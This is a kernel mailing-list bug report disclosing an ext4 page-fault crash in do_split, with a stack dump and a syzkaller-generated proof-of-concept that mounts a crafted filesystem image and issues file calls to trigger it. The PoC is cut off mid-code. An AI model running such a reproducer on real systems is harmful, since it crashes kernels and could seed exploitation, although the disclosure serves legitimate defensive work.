From: "Ubisectech Sirius" <bugreport@ubisectech.com>
To: "linux-trace-kernel" <linux-trace-kernel@vger.kernel.org>,
"linux-kernel" <linux-kernel@vger.kernel.org>
Cc: "tytso" <tytso@mit.edu>, "adilger.kernel" <adilger.kernel@dilger.ca>
Subject: BUG: unable to handle kernel paging request in do_split
Date: Tue, 30 Apr 2024 09:16:50 +0800 [thread overview]
Message-ID: <b4f743e5-ad5b-48cf-827b-e3da9bb448a2.bugreport@ubisectech.com> (raw)
[-- Attachment #1: Type: text/plain, Size: 5101 bytes --]
Hello.
We are Ubisectech Sirius Team, the vulnerability lab of China ValiantSec. Recently, our team has discovered a issue in Linux kernel 6.7. Attached to the email were a PoC file of the issue.
Stack dump:
BUG: unable to handle page fault for address: ffffed110c2fd97f
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 7ffd0067 P4D 7ffd0067 PUD 0
Oops: 0000 [#1] PREEMPT SMP KASAN NOPTI
CPU: 0 PID: 24082 Comm: syz-executor.3 Not tainted 6.7.0 #2
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:do_split+0xfef/0x1e10 fs/ext4/namei.c:2047
Code: d2 0f 85 38 0b 00 00 8b 45 00 89 84 24 84 00 00 00 41 8d 45 ff 48 8d 1c c3 48 b8 00 00 00 00 00 fc ff df 48 89 da 48 c1 ea 03 <0f> b6 14 02 48 89 d8 83 e0 07 83 c0 03 38 d0 7c 08 84 d2 0f 85 ef
RSP: 0018:ffffc90001e9f858 EFLAGS: 00010a02
RAX: dffffc0000000000 RBX: ffff8888617ecbf8 RCX: ffffc9001048f000
RDX: 1ffff1110c2fd97f RSI: ffffffff823364ab RDI: 0000000000000005
RBP: ffff8880617ecc00 R08: 0000000000000005 R09: 00000000ffffffff
R10: 00000000ffffffff R11: 0000000000000000 R12: dffffc0000000000
R13: 0000000000000000 R14: 00000000ffffffff R15: ffff88801ee8d2b0
FS: 00007f191402a640(0000) GS:ffff88802c600000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffed110c2fd97f CR3: 000000005500a000 CR4: 0000000000750ef0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
PKRU: 55555554
Call Trace:
<TASK>
make_indexed_dir+0x1158/0x1540 fs/ext4/namei.c:2342
ext4_add_entry+0xcd0/0xe80 fs/ext4/namei.c:2454
ext4_add_nondir+0x90/0x2b0 fs/ext4/namei.c:2795
ext4_symlink+0x539/0x9e0 fs/ext4/namei.c:3436
vfs_symlink fs/namei.c:4464 [inline]
vfs_symlink+0x3f6/0x640 fs/namei.c:4448
do_symlinkat+0x245/0x2f0 fs/namei.c:4490
__do_sys_symlink fs/namei.c:4511 [inline]
__se_sys_symlink fs/namei.c:4509 [inline]
__x64_sys_symlink+0x79/0xa0 fs/namei.c:4509
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x43/0x120 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x6f/0x77
RIP: 0033:0x7f191329002d
Code: c3 e8 97 2b 00 00 0f 1f 80 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f191402a028 EFLAGS: 00000246 ORIG_RAX: 0000000000000058
RAX: ffffffffffffffda RBX: 00007f19133cbf80 RCX: 00007f191329002d
RDX: 0000000000000000 RSI: 0000000020000e40 RDI: 0000000020001640
RBP: 00007f19132f14d0 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 000000000000000b R14: 00007f19133cbf80 R15: 00007f191400a000
</TASK>
Modules linked in:
CR2: ffffed110c2fd97f
---[ end trace 0000000000000000 ]---
RIP: 0010:do_split+0xfef/0x1e10 fs/ext4/namei.c:2047
Code: d2 0f 85 38 0b 00 00 8b 45 00 89 84 24 84 00 00 00 41 8d 45 ff 48 8d 1c c3 48 b8 00 00 00 00 00 fc ff df 48 89 da 48 c1 ea 03 <0f> b6 14 02 48 89 d8 83 e0 07 83 c0 03 38 d0 7c 08 84 d2 0f 85 ef
RSP: 0018:ffffc90001e9f858 EFLAGS: 00010a02
RAX: dffffc0000000000 RBX: ffff8888617ecbf8 RCX: ffffc9001048f000
RDX: 1ffff1110c2fd97f RSI: ffffffff823364ab RDI: 0000000000000005
RBP: ffff8880617ecc00 R08: 0000000000000005 R09: 00000000ffffffff
R10: 00000000ffffffff R11: 0000000000000000 R12: dffffc0000000000
R13: 0000000000000000 R14: 00000000ffffffff R15: ffff88801ee8d2b0
FS: 00007f191402a640(0000) GS:ffff88802c600000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffed110c2fd97f CR3: 000000005500a000 CR4: 0000000000750ef0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
PKRU: 55555554
----------------
Code disassembly (best guess):
0: d2 0f rorb %cl,(%rdi)
2: 85 38 test %edi,(%rax)
4: 0b 00 or (%rax),%eax
6: 00 8b 45 00 89 84 add %cl,-0x7b76ffbb(%rbx)
c: 24 84 and $0x84,%al
e: 00 00 add %al,(%rax)
10: 00 41 8d add %al,-0x73(%rcx)
13: 45 ff 48 8d rex.RB decl -0x73(%r8)
17: 1c c3 sbb $0xc3,%al
19: 48 b8 00 00 00 00 00 movabs $0xdffffc0000000000,%rax
20: fc ff df
23: 48 89 da mov %rbx,%rdx
26: 48 c1 ea 03 shr $0x3,%rdx
* 2a: 0f b6 14 02 movzbl (%rdx,%rax,1),%edx <-- trapping instruction
2e: 48 89 d8 mov %rbx,%rax
31: 83 e0 07 and $0x7,%eax
34: 83 c0 03 add $0x3,%eax
37: 38 d0 cmp %dl,%al
39: 7c 08 jl 0x43
3b: 84 d2 test %dl,%dl
3d: 0f .byte 0xf
3e: 85 ef test %ebp,%edi
Thank you for taking the time to read this email and we look forward to working with you further.
[-- Attachment #2: poc.c --]
[-- Type: application/octet-stream, Size: 23371 bytes --]
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <setjmp.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/loop.h>
#ifndef __NR_memfd_create
#define __NR_memfd_create 319
#endif
#ifndef __NR_renameat2
#define __NR_renameat2 316
#endif
static unsigned long long procid;
//% This code is derived from puff.{c,h}, found in the zlib development. The
//% original files come with the following copyright notice:
//% Copyright (C) 2002-2013 Mark Adler, all rights reserved
//% version 2.3, 21 Jan 2013
//% This software is provided 'as-is', without any express or implied
//% warranty. In no event will the author be held liable for any damages
//% arising from the use of this software.
//% Permission is granted to anyone to use this software for any purpose,
//% including commercial applications, and to alter it and redistribute it
//% freely, subject to the following restrictions:
//% 1. The origin of this software must not be misrepresented; you must not
//% claim that you wrote the original software. If you use this software
//% in a product, an acknowledgment in the product documentation would be
//% appreciated but is not required.
//% 2. Altered source versions must be plainly marked as such, and must not be
//% misrepresented as being the original software.
//% 3. This notice may not be removed or altered from any source distribution.
//% Mark Adler madler@alumni.caltech.edu
//% BEGIN CODE DERIVED FROM puff.{c,h}
#define MAXBITS 15
#define MAXLCODES 286
#define MAXDCODES 30
#define MAXCODES (MAXLCODES + MAXDCODES)
#define FIXLCODES 288
struct puff_state {
unsigned char* out;
unsigned long outlen;
unsigned long outcnt;
const unsigned char* in;
unsigned long inlen;
unsigned long incnt;
int bitbuf;
int bitcnt;
jmp_buf env;
};
static int puff_bits(struct puff_state* s, int need)
{
long val = s->bitbuf;
while (s->bitcnt < need) {
if (s->incnt == s->inlen)
longjmp(s->env, 1);
val |= (long)(s->in[s->incnt++]) << s->bitcnt;
s->bitcnt += 8;
}
s->bitbuf = (int)(val >> need);
s->bitcnt -= need;
return (int)(val & ((1L << need) - 1));
}
static int puff_stored(struct puff_state* s)
{
s->bitbuf = 0;
s->bitcnt = 0;
if (s->incnt + 4 > s->inlen)
return 2;
unsigned len = s->in[s->incnt++];
len |= s->in[s->incnt++] << 8;
if (s->in[s->incnt++] != (~len & 0xff) ||
s->in[s->incnt++] != ((~len >> 8) & 0xff))
return -2;
if (s->incnt + len > s->inlen)
return 2;
if (s->outcnt + len > s->outlen)
return 1;
for (; len--; s->outcnt++, s->incnt++) {
if (s->in[s->incnt])
s->out[s->outcnt] = s->in[s->incnt];
}
return 0;
}
struct puff_huffman {
short* count;
short* symbol;
};
static int puff_decode(struct puff_state* s, const struct puff_huffman* h)
{
int first = 0;
int index = 0;
int bitbuf = s->bitbuf;
int left = s->bitcnt;
int code = first = index = 0;
int len = 1;
short* next = h->count + 1;
while (1) {
while (left--) {
code |= bitbuf & 1;
bitbuf >>= 1;
int count = *next++;
if (code - count < first) {
s->bitbuf = bitbuf;
s->bitcnt = (s->bitcnt - len) & 7;
return h->symbol[index + (code - first)];
}
index += count;
first += count;
first <<= 1;
code <<= 1;
len++;
}
left = (MAXBITS + 1) - len;
if (left == 0)
break;
if (s->incnt == s->inlen)
longjmp(s->env, 1);
bitbuf = s->in[s->incnt++];
if (left > 8)
left = 8;
}
return -10;
}
static int puff_construct(struct puff_huffman* h, const short* length, int n)
{
int len;
for (len = 0; len <= MAXBITS; len++)
h->count[len] = 0;
int symbol;
for (symbol = 0; symbol < n; symbol++)
(h->count[length[symbol]])++;
if (h->count[0] == n)
return 0;
int left = 1;
for (len = 1; len <= MAXBITS; len++) {
left <<= 1;
left -= h->count[len];
if (left < 0)
return left;
}
short offs[MAXBITS + 1];
offs[1] = 0;
for (len = 1; len < MAXBITS; len++)
offs[len + 1] = offs[len] + h->count[len];
for (symbol = 0; symbol < n; symbol++)
if (length[symbol] != 0)
h->symbol[offs[length[symbol]]++] = symbol;
return left;
}
static int puff_codes(struct puff_state* s, const struct puff_huffman* lencode,
const struct puff_huffman* distcode)
{
static const short lens[29] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 13,
15, 17, 19, 23, 27, 31, 35, 43, 51, 59,
67, 83, 99, 115, 131, 163, 195, 227, 258};
static const short lext[29] = {0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2,
2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0};
static const short dists[30] = {
1, 2, 3, 4, 5, 7, 9, 13, 17, 25,
33, 49, 65, 97, 129, 193, 257, 385, 513, 769,
1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577};
static const short dext[30] = {0, 0, 0, 0, 1, 1, 2, 2, 3, 3,
4, 4, 5, 5, 6, 6, 7, 7, 8, 8,
9, 9, 10, 10, 11, 11, 12, 12, 13, 13};
int symbol;
do {
symbol = puff_decode(s, lencode);
if (symbol < 0)
return symbol;
if (symbol < 256) {
if (s->outcnt == s->outlen)
return 1;
if (symbol)
s->out[s->outcnt] = symbol;
s->outcnt++;
} else if (symbol > 256) {
symbol -= 257;
if (symbol >= 29)
return -10;
int len = lens[symbol] + puff_bits(s, lext[symbol]);
symbol = puff_decode(s, distcode);
if (symbol < 0)
return symbol;
unsigned dist = dists[symbol] + puff_bits(s, dext[symbol]);
if (dist > s->outcnt)
return -11;
if (s->outcnt + len > s->outlen)
return 1;
while (len--) {
if (dist <= s->outcnt && s->out[s->outcnt - dist])
s->out[s->outcnt] = s->out[s->outcnt - dist];
s->outcnt++;
}
}
} while (symbol != 256);
return 0;
}
static int puff_fixed(struct puff_state* s)
{
static int virgin = 1;
static short lencnt[MAXBITS + 1], lensym[FIXLCODES];
static short distcnt[MAXBITS + 1], distsym[MAXDCODES];
static struct puff_huffman lencode, distcode;
if (virgin) {
lencode.count = lencnt;
lencode.symbol = lensym;
distcode.count = distcnt;
distcode.symbol = distsym;
short lengths[FIXLCODES];
int symbol;
for (symbol = 0; symbol < 144; symbol++)
lengths[symbol] = 8;
for (; symbol < 256; symbol++)
lengths[symbol] = 9;
for (; symbol < 280; symbol++)
lengths[symbol] = 7;
for (; symbol < FIXLCODES; symbol++)
lengths[symbol] = 8;
puff_construct(&lencode, lengths, FIXLCODES);
for (symbol = 0; symbol < MAXDCODES; symbol++)
lengths[symbol] = 5;
puff_construct(&distcode, lengths, MAXDCODES);
virgin = 0;
}
return puff_codes(s, &lencode, &distcode);
}
static int puff_dynamic(struct puff_state* s)
{
static const short order[19] = {16, 17, 18, 0, 8, 7, 9, 6, 10, 5,
11, 4, 12, 3, 13, 2, 14, 1, 15};
int nlen = puff_bits(s, 5) + 257;
int ndist = puff_bits(s, 5) + 1;
int ncode = puff_bits(s, 4) + 4;
if (nlen > MAXLCODES || ndist > MAXDCODES)
return -3;
short lengths[MAXCODES];
int index;
for (index = 0; index < ncode; index++)
lengths[order[index]] = puff_bits(s, 3);
for (; index < 19; index++)
lengths[order[index]] = 0;
short lencnt[MAXBITS + 1], lensym[MAXLCODES];
struct puff_huffman lencode = {lencnt, lensym};
int err = puff_construct(&lencode, lengths, 19);
if (err != 0)
return -4;
index = 0;
while (index < nlen + ndist) {
int symbol;
int len;
symbol = puff_decode(s, &lencode);
if (symbol < 0)
return symbol;
if (symbol < 16)
lengths[index++] = symbol;
else {
len = 0;
if (symbol == 16) {
if (index == 0)
return -5;
len = lengths[index - 1];
symbol = 3 + puff_bits(s, 2);
} else if (symbol == 17)
symbol = 3 + puff_bits(s, 3);
else
symbol = 11 + puff_bits(s, 7);
if (index + symbol > nlen + ndist)
return -6;
while (symbol--)
lengths[index++] = len;
}
}
if (lengths[256] == 0)
return -9;
err = puff_construct(&lencode, lengths, nlen);
if (err && (err < 0 || nlen != lencode.count[0] + lencode.count[1]))
return -7;
short distcnt[MAXBITS + 1], distsym[MAXDCODES];
struct puff_huffman distcode = {distcnt, distsym};
err = puff_construct(&distcode, lengths + nlen, ndist);
if (err && (err < 0 || ndist != distcode.count[0] + distcode.count[1]))
return -8;
return puff_codes(s, &lencode, &distcode);
}
static int puff(unsigned char* dest, unsigned long* destlen,
const unsigned char* source, unsigned long sourcelen)
{
struct puff_state s = {
.out = dest,
.outlen = *destlen,
.outcnt = 0,
.in = source,
.inlen = sourcelen,
.incnt = 0,
.bitbuf = 0,
.bitcnt = 0,
};
int err;
if (setjmp(s.env) != 0)
err = 2;
else {
int last;
do {
last = puff_bits(&s, 1);
int type = puff_bits(&s, 2);
err = type == 0 ? puff_stored(&s)
: (type == 1 ? puff_fixed(&s)
: (type == 2 ? puff_dynamic(&s) : -1));
if (err != 0)
break;
} while (!last);
}
*destlen = s.outcnt;
return err;
}
//% END CODE DERIVED FROM puff.{c,h}
#define ZLIB_HEADER_WIDTH 2
static int puff_zlib_to_file(const unsigned char* source,
unsigned long sourcelen, int dest_fd)
{
if (sourcelen < ZLIB_HEADER_WIDTH)
return 0;
source += ZLIB_HEADER_WIDTH;
sourcelen -= ZLIB_HEADER_WIDTH;
const unsigned long max_destlen = 132 << 20;
void* ret = mmap(0, max_destlen, PROT_WRITE | PROT_READ,
MAP_PRIVATE | MAP_ANON, -1, 0);
if (ret == MAP_FAILED)
return -1;
unsigned char* dest = (unsigned char*)ret;
unsigned long destlen = max_destlen;
int err = puff(dest, &destlen, source, sourcelen);
if (err) {
munmap(dest, max_destlen);
errno = -err;
return -1;
}
if (write(dest_fd, dest, destlen) != (ssize_t)destlen) {
munmap(dest, max_destlen);
return -1;
}
return munmap(dest, max_destlen);
}
static int setup_loop_device(unsigned char* data, unsigned long size,
const char* loopname, int* loopfd_p)
{
int err = 0, loopfd = -1;
int memfd = syscall(__NR_memfd_create, "syzkaller", 0);
if (memfd == -1) {
err = errno;
goto error;
}
if (puff_zlib_to_file(data, size, memfd)) {
err = errno;
goto error_close_memfd;
}
loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
err = errno;
goto error_close_memfd;
}
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
if (errno != EBUSY) {
err = errno;
goto error_close_loop;
}
ioctl(loopfd, LOOP_CLR_FD, 0);
usleep(1000);
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
err = errno;
goto error_close_loop;
}
}
close(memfd);
*loopfd_p = loopfd;
return 0;
error_close_loop:
close(loopfd);
error_close_memfd:
close(memfd);
error:
errno = err;
return -1;
}
static void reset_loop_device(const char* loopname)
{
int loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
return;
}
if (ioctl(loopfd, LOOP_CLR_FD, 0)) {
}
close(loopfd);
}
static long syz_mount_image(volatile long fsarg, volatile long dir,
volatile long flags, volatile long optsarg,
volatile long change_dir,
volatile unsigned long size, volatile long image)
{
unsigned char* data = (unsigned char*)image;
int res = -1, err = 0, need_loop_device = !!size;
char* mount_opts = (char*)optsarg;
char* target = (char*)dir;
char* fs = (char*)fsarg;
char* source = NULL;
char loopname[64];
if (need_loop_device) {
int loopfd;
memset(loopname, 0, sizeof(loopname));
snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
if (setup_loop_device(data, size, loopname, &loopfd) == -1)
return -1;
close(loopfd);
source = loopname;
}
mkdir(target, 0777);
char opts[256];
memset(opts, 0, sizeof(opts));
if (strlen(mount_opts) > (sizeof(opts) - 32)) {
}
strncpy(opts, mount_opts, sizeof(opts) - 32);
if (strcmp(fs, "iso9660") == 0) {
flags |= MS_RDONLY;
} else if (strncmp(fs, "ext", 3) == 0) {
bool has_remount_ro = false;
char* remount_ro_start = strstr(opts, "errors=remount-ro");
if (remount_ro_start != NULL) {
char after = *(remount_ro_start + strlen("errors=remount-ro"));
char before = remount_ro_start == opts ? '\0' : *(remount_ro_start - 1);
has_remount_ro = ((before == '\0' || before == ',') &&
(after == '\0' || after == ','));
}
if (strstr(opts, "errors=panic") || !has_remount_ro)
strcat(opts, ",errors=continue");
} else if (strcmp(fs, "xfs") == 0) {
strcat(opts, ",nouuid");
}
res = mount(source, target, fs, flags, opts);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
res = open(target, O_RDONLY | O_DIRECTORY);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
if (change_dir) {
res = chdir(target);
if (res == -1) {
err = errno;
}
}
error_clear_loop:
if (need_loop_device)
reset_loop_device(loopname);
errno = err;
return res;
}
uint64_t r[1] = {0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
intptr_t res = 0;
memcpy((void*)0x20000180, "ext4\000", 5);
memcpy((void*)0x200000c0, "./file1\000", 8);
*(uint8_t*)0x20000740 = 0;
memcpy(
(void*)0x20000dc0,
"\x78\x9c\xec\xdc\xcb\x6f\x54\xd5\x1f\x00\xf0\xef\xbd\xd3\x96\x37\xed\x8f"
"\x1f\xa2\xf2\x90\x2a\x1a\x1b\x1f\x2d\x2d\xa8\x2c\xdc\x68\x74\xa7\x89\x89"
"\x2e\x70\x63\x52\xdb\x42\x2a\x03\x35\xb4\x24\x42\x88\x56\x63\x70\x69\x48"
"\xdc\x1b\x57\xc6\xe8\x5f\xe0\x4a\x37\x46\x5d\x99\xb8\xd5\xbd\x21\x21\x4a"
"\x4c\x40\x17\x66\xcc\xbd\x73\x6f\x69\xcb\x4c\x5f\x4c\x99\xe2\x7c\x3e\xc9"
"\x1d\xce\x99\x7b\x66\xce\xf9\xce\xb9\x67\xee\xb9\xf7\x30\x0d\xa0\x63\xf5"
"\x67\x0f\x49\xc4\xf6\x88\xf8\x25\x22\x7a\xeb\xd9\x85\x05\xfa\xeb\xff\xdc"
"\xb8\x76\x71\xec\xaf\x6b\x17\xc7\x92\xa8\xd5\x5e\xfd\x3d\xc9\xcb\x5d\xbf"
"\x76\x71\xac\x2c\x5a\xbe\x6e\x5b\x91\x19\x48\x23\xd2\x0f\x93\xa2\x92\x85"
"\xa6\xcf\x5f\x38\x35\x5a\xad\x4e\x9c\x2d\xf2\x43\x33\xa7\xdf\x1e\x9a\x3e"
"\x7f\xe1\xc9\xc9\xd3\xa3\x27\x27\x4e\x4e\x9c\x19\x39\x76\xec\xe8\x91\xe1"
"\x67\x9e\x1e\x79\xaa\x25\x71\x66\x71\x5d\xdf\xfb\xee\xd4\xfe\xa4\xeb\xf5"
"\xcb\x2f\x8f\x1d\xbf\xfc\xe6\x0f\x5f\x75\x45\xc4\x9e\x03\xf5\xfd\xf3\xe3"
"\xb8\x2d\xe9\xb6\xb9\x64\x7f\x16\xf8\x1f\xb5\xdc\xe2\x62\x8f\xb4\xa4\xb2"
"\x8d\x63\xc7\xbc\x74\xd2\xd5\xc6\x86\xb0\x2a\x95\x88\xc8\xba\xab\x3b\x1f"
"\xff\xbd\x51\x89\x9b\x9d\xd7\x1b\x2f\x7e\xd0\xd6\xc6\x01\xeb\x2a\x3b\x37"
"\x6d\x6a\xbe\x7b\xb6\x06\xfc\x87\x25\xd1\xee\x16\x00\xed\x51\x9e\xe8\xb3"
"\xeb\xdf\x72\xbb\x43\x53\x8f\x0d\xe1\xea\x73\xf5\x0b\xa0\x2c\xee\x1b\xc5"
"\x56\xdf\xd3\x15\x69\x51\xa6\x7b\x1d\xeb\xbf\x2f\x22\x8e\xcf\xfe\xfd\x69"
"\xb6\x45\xd1\x0f\xff\x6c\x5f\xc7\x0a\x01\x80\x8e\xf7\x4d\x36\xff\x79\xa2"
"\xd1\xfc\x2f\x8d\x3d\xf3\xca\xed\x2c\xd6\x50\xfa\x22\xe2\x7f\x11\xb1\x2b"
"\x22\xfe\x1f\x11\xbb\x23\xe2\x9e\x88\xbc\xec\xbd\xc5\x7c\x66\x35\xea\x4b"
"\x43\x95\xb9\xfc\xad\xf3\xcf\xf4\xca\x9a\x83\x5b\x81\x6c\xfe\xf7\x6c\xb1"
"\xb6\xb5\x70\xfe\x57\xce\xfe\xa2\xaf\x52\xe4\x76\xe4\xf1\x77\x27\x27\x26"
"\xab\x13\x87\x8b\xcf\x64\x20\xba\x37\x65\xf9\xe1\x25\xea\xf8\xf6\x85\x9f"
"\x3f\x6e\xb6\xaf\x7f\xde\xfc\x2f\xdb\xb2\xfa\xcb\xb9\x60\xd1\x8e\x2b\x5d"
"\x8b\x6e\xd0\x8d\x8f\xce\x8c\xb6\x6a\x52\x7a\xf5\xfd\x88\xbd\x5d\x8d\xe2"
"\x4f\xe6\x56\x02\x92\x88\xb8\x3f\x22\xf6\xae\xee\xad\x77\x96\x89\xc9\xc7"
"\xbe\xd8\xdf\xac\xd0\xf2\xf1\x2f\xa1\x05\xeb\x4c\xb5\xcf\x22\x1e\xad\xf7"
"\xff\x6c\x2c\x8a\xbf\x94\x2c\xbd\x3e\x39\xb4\x39\xaa\x13\x87\x87\xca\xa3"
"\xe2\x56\x3f\xfe\x74\xe9\x95\xc6\xb5\x6f\xbe\xbd\xf8\x5b\x20\xeb\xff\xad"
"\x0b\x8f\xff\x45\x25\x7a\xff\x4c\xe6\xaf\xd7\x4e\xaf\xbe\x8e\x4b\xbf\x7e"
"\xd4\xf4\x9a\x72\xad\xc7\x7f\x4f\xf2\x5a\x3e\x26\x7b\x8a\xe7\xde\x19\x9d"
"\x99\x39\x3b\x1c\xd1\x93\xbc\x94\xe7\x17\x3c\x3f\x72\xf3\xb5\x65\xbe\x2c"
"\x9f\xc5\x3f\x70\xa8\xf1\xf8\xdf\x55\xbc\x26\x8b\x7f\x5f\x44\x64\x07\xf1"
"\x81\x88\x78\x20\x22\x0e\x16\x6d\x7f\x30\x22\x1e\x8a\x88\x43\x4b\xc4\xff"
"\xfd\xf3\x0f\xbf\xb5\xaa\xf8\x27\xef\x6c\xff\x8f\x37\xfc\xfe\x9b\x3b\xfe"
"\xfb\x16\xf6\xff\xea\x13\x95\x53\xdf\x7d\xdd\xac\xfe\x95\xf5\xff\xd1\x3c"
"\x35\x50\x3c\x93\x7f\xff\x2d\xa3\x79\x73\xa2\x3a\x11\x51\xab\xad\xf9\x68"
"\x06\x00\x00\x80\xbb\x4f\x1a\x11\xdb\x23\x49\x07\xe7\xd2\x69\x3a\x38\x58"
"\xff\x3f\xfc\xbb\x63\x6b\x5a\x9d\x9a\x9e\x79\xfc\xc4\xd4\xb9\x33\xe3\xf5"
"\xdf\x08\xf4\x45\x77\x5a\xde\xe9\xea\x2d\xee\x87\x66\x57\xdb\xc3\xc9\x6c"
"\xf1\x8e\xf5\xfb\xa3\x23\xc5\xbd\xe2\xf2\x7e\xe9\x91\xe2\xbe\xf1\x27\x95"
"\x2d\x79\x7e\x70\x6c\xaa\x3a\xde\xe6\xd8\xa1\xd3\x6d\x6b\x32\xfe\x33\xbf"
"\x55\xda\xdd\x3a\x60\xdd\xf9\xbd\x16\x74\xae\xc5\xe3\x3f\x6d\x53\x3b\x80"
"\x3b\xcf\xf9\x1f\x3a\x97\xf1\x0f\x9d\xcb\xf8\x87\xce\x35\x6f\xfc\x7f\x79"
"\xee\xd2\xbe\x3c\xf1\x5e\xfe\x78\x70\x6e\x47\xc3\xb5\x80\x25\xfe\x72\x08"
"\x70\x77\x70\xfe\x87\xce\x65\xfc\x43\xe7\x32\xfe\xa1\x73\x19\xff\xd0\x91"
"\x6e\xe7\x77\xfd\xed\x49\x6c\x29\x5a\xbe\x5c\xe1\x9e\xf6\x37\x75\x6d\x89"
"\xcf\xbb\x37\x44\x33\x96\x4b\x44\xba\x54\x99\x37\xa2\xf1\xae\xfe\x88\x58"
"\xa7\x86\xc5\x86\xf8\x58\x5a\x9d\x48\x56\x70\xa8\xaf\x34\x71\xe2\x64\x31"
"\x74\x56\x52\xb8\x9d\xdf\x4a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\xad\xf3\x6f\x00\x00\x00\xff\xff\x1b\xcc\xe5\x51",
1165);
syz_mount_image(/*fs=*/0x20000180, /*dir=*/0x200000c0,
/*flags=MS_SYNCHRONOUS*/ 0x10, /*opts=*/0x20000740,
/*chdir=*/0xfe, /*size=*/0x48d, /*img=*/0x20000dc0);
memcpy((void*)0x200002c0, "./file0\000", 8);
syscall(__NR_mknod, /*file=*/0x200002c0ul, /*mode=*/0ul, /*dev=*/0x700);
memcpy((void*)0x20000100, "./file1\000", 8);
syscall(
__NR_open, /*file=*/0x20000100ul,
/*flags=O_NONBLOCK|O_NOFOLLOW|O_NOATIME|O_DIRECT|O_CREAT|0x2*/ 0x64842ul,
/*mode=*/0ul);
memcpy((void*)0x20000000,
"./"
"file0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\000",
250);
syscall(__NR_mknod, /*file=*/0x20000000ul, /*mode=*/0ul, /*dev=*/0x701);
memcpy((void*)0x20000940, "./file0\000", 8);
memcpy((void*)0x20000d40,
"./"
